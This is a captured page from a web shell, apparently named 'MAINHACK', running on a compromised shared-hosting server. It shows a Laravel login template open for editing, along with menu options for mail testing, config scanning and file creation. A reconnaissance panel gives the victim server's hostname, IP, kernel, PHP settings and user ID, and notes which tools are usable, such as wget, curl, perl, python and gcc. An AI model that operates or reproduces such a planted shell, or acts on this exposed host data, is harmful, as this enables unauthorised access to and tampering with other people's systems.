[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: auth.blade.php
<!DOCTYPE html> <html lang="{{ app()->getLocale() }}"> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <!-- Tell the browser to be responsive to screen width --> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <title>@yield('title') - {{ config('app.name', 'POS') }}</title> @include('layouts.partials.css') @include('layouts.partials.extracss_auth') </head> <body class="hold-transition" style="height: auto;"> @if (session('status')) <input type="hidden" id="status_span" data-status="{{ session('status.success') }}" data-msg="{{ session('status.msg') }}"> @endif @if (!isset($no_header)) @include('layouts.partials.header-auth') @endif @yield('content') @include('layouts.partials.javascripts') <!-- Scripts --> <script src="{{ asset('js/login.js?v=' . $asset_v) }}"></script> @yield('javascript') <script type="text/javascript"> $(document).ready(function() { $('.select2_register').select2(); // $('input').iCheck({ // checkboxClass: 'icheckbox_square-blue', // radioClass: 'iradio_square-blue', // increaseArea: '20%' // optional // }); }); </script> </body> </html>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285